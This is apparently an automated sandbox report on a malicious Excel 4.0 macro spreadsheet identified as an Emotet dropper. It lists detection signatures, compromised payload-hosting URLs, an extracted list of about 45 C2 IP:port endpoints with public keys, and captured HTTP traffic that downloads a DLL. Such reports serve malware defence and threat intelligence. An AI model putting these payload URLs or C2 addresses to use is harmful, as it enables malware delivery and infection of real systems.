Windows Analysis Report
CJ68000754184.xls

Overview

General Information

Sample Name: CJ68000754184.xls
Analysis ID: 562418
MD5: 84edef677d286111cb0ef9d53e0d51df
SHA1: 19548ae67f6ffec8a1c2cb9b768cb1e64d29dbcb
SHA256: 081b5ea7f6d4ce96c9c97811785f86a68809a51eaadba0928406f562ec8ea58a
Tags: SilentBuilderxls

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection

Source: http://maxtdeveloper.com/okw9yx/ Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/ Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/PE3 Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/f Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3 Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/ Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3 Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.png Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3 Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-adm Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/ Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/ Avira URL Cloud: Label: malware
Source: http://hostfeeling.com Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/ Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/ Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3 Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/PE3 Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3 Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/PE3 Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/ Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/9 Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/PE3 Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/ Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/ Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/ Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/ Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/ Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-cont Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/PE3 Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3 Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/ Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.html Avira URL Cloud: Label: malware
Source: 12.2.rundll32.exe.1b0000.1.unpack Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Source: CJ68000754184.xls Virustotal: Detection: 13%
Source: CJ68000754184.xls ReversingLabs: Detection: 18%
Source: hostfeeling.com Virustotal: Detection: 10%
Source: C:\ProgramData\JooSee.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: >ystem.pdbW source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 12_2_10021854

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80
Source: global traffic DNS query: name: hostfeeling.com
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80

Networking

Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80
Source: Malware configuration extractor IPs: 160.16.102.168:80
Source: Malware configuration extractor IPs: 131.100.24.231:80
Source: Malware configuration extractor IPs: 200.17.134.35:7080
Source: Malware configuration extractor IPs: 207.38.84.195:8080
Source: Malware configuration extractor IPs: 212.237.56.116:7080
Source: Malware configuration extractor IPs: 58.227.42.236:80
Source: Malware configuration extractor IPs: 104.251.214.46:8080
Source: Malware configuration extractor IPs: 158.69.222.101:443
Source: Malware configuration extractor IPs: 192.254.71.210:443
Source: Malware configuration extractor IPs: 46.55.222.11:443
Source: Malware configuration extractor IPs: 45.118.135.203:7080
Source: Malware configuration extractor IPs: 107.182.225.142:8080
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 104.168.155.129:8080
Source: Malware configuration extractor IPs: 195.154.133.20:443
Source: Malware configuration extractor IPs: 159.8.59.82:8080
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 45.142.114.231:8080
Source: Malware configuration extractor IPs: 41.76.108.46:8080
Source: Malware configuration extractor IPs: 203.114.109.124:443
Source: Malware configuration extractor IPs: 50.116.54.215:443
Source: Malware configuration extractor IPs: 209.59.138.75:7080
Source: Malware configuration extractor IPs: 185.157.82.211:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 162.214.50.39:7080
Source: Malware configuration extractor IPs: 138.185.72.26:8080
Source: Malware configuration extractor IPs: 178.63.25.185:443
Source: Malware configuration extractor IPs: 51.15.4.22:443
Source: Malware configuration extractor IPs: 81.0.236.90:443
Source: Malware configuration extractor IPs: 216.158.226.206:443
Source: Malware configuration extractor IPs: 45.176.232.124:443
Source: Malware configuration extractor IPs: 162.243.175.63:443
Source: Malware configuration extractor IPs: 212.237.17.99:8080
Source: Malware configuration extractor IPs: 45.118.115.99:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 173.214.173.220:8080
Source: Malware configuration extractor IPs: 178.79.147.66:8080
Source: Malware configuration extractor IPs: 176.104.106.96:8080
Source: Malware configuration extractor IPs: 51.38.71.0:443
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 212.24.98.99:8080
Source: Malware configuration extractor IPs: 159.89.230.105:443
Source: Malware configuration extractor IPs: 79.172.212.216:8080
Source: Malware configuration extractor IPs: 212.237.5.209:443
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 20:18:49 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.27X-Powered-By: PHP/7.4.27Set-Cookie: 61f44fa975c8c=1643401129; expires=Fri, 28-Jan-2022 20:19:49 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:18:49 GMTExpires: Fri, 28 Jan 2022 20:18:49 GMTContent-Disposition: attachment; filename="KfCx9N.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 
05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View ASN Name: S-NET-ASPL S-NET-ASPL
Source: Joe Sandbox View IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View IP Address: 185.157.82.211 185.157.82.211
Source: unknown Network traffic detected: IP country count 21
Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172
Source: mshta.exe, 00000004.00000002.445696631.0000000000396000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.441775503.00000000002F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.html
Source: CJ68000754184.xls.0.dr String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlB
Source: mshta.exe, 00000004.00000002.445452336.0000000000260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.html_
Source: mshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlb
Source: mshta.exe, 00000004.00000003.420330399.00000000002E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmld
Source: mshta.exe, 00000004.00000003.423260829.00000000032DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.422456833.00000000032D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
Source: mshta.exe, 00000004.00000002.446063365.00000000039DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmll
Source: mshta.exe, 00000004.00000002.445452336.0000000000260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlmshta
Source: mshta.exe, 00000004.00000002.445509209.00000000002BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443936246.00000000002B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlngs
Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.p
Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.png
Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.pngPE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/libraries/8s/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/libraries/8s/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-adm
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.suk
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-cont
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/PE3
Source: powershell.exe, 00000006.00000002.685196853.00000000037CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/asset
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/f
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
Source: powershell.exe, 00000006.00000002.677562211.00000000002AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.677314579.0000000000260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://w
Source: powershell.exe, 00000006.00000002.677562211.00000000002AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.420738023.0000000003A2C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: mshta.exe, 00000004.00000002.446348661.0000000003CAA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/
Source: mshta.exe, 00000004.00000003.441443397.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420217264.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446302477.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/ll
Source: mshta.exe, 00000004.00000003.441588224.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446294886.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420167396.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443804667.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/r
Source: mshta.exe, 00000004.00000003.420287820.0000000003A31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.comP
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/9
